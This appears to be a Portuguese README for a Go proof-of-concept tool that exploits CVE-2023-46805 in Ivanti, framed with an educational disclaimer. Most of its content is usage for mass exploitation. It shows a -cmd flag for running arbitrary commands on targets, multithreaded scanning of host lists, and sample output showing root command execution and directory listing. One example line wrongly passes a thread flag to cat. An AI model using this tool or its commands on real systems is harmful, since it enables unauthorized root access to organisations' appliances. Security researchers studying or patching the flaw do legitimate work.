
CVE-2023-46805 Ivanti POC RCE - Scanner ultrarrápido.
Título: Prova de Conceito para CVE-2023-46805 - Apenas para Uso Educacional
Licença: Este trabalho está licenciado sob a Creative Commons Attribution 4.0 International License (CC BY 4.0). Você é livre para compartilhar, copiar, distribuir e transmitir este trabalho, adaptá-lo ou usá-lo para outros fins, desde que a autoria seja devidamente atribuída.
Aviso Legal: Esta Prova de Conceito (PoC) é fornecida apenas para fins educacionais e de pesquisa em segurança cibernética. Nem o autor, nem a organização afiliada, nem qualquer outra parte envolvida na criação, produção ou entrega deste conteúdo será responsável por quaisquer danos, incluindo, mas não se limitando a, danos diretos, indiretos, incidentais, especiais, consequenciais ou punitivos decorrentes do uso ou da impossibilidade de uso deste conteúdo.
Objetivo Educacional: Esta PoC tem como objetivo auxiliar a comunidade de segurança cibernética a compreender e mitigar a vulnerabilidade identificada como CVE-2023-46805. Ela não deve ser utilizada em ambiente de produção ou para atividades maliciosas.
Descrição da Vulnerabilidade: Ivanti RCE
Detalhes da PoC:
Usage of ./CVE-Ivanti:
-cmd string
The command to replace 'id' in the payload (default "id")
-t int
Number of concurrent threads (default 5)
go build
echo "https://1.2.3.4" | ./CVE-Ivanti
https://1.2.3.4 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
cat myscope.txt -t 5 | ./CVE-Ivanti
https://ssl1.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
https://ssl3.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
echo "https://1.2.3.4" | ./CVE-Ivanti -cmd 'ls /'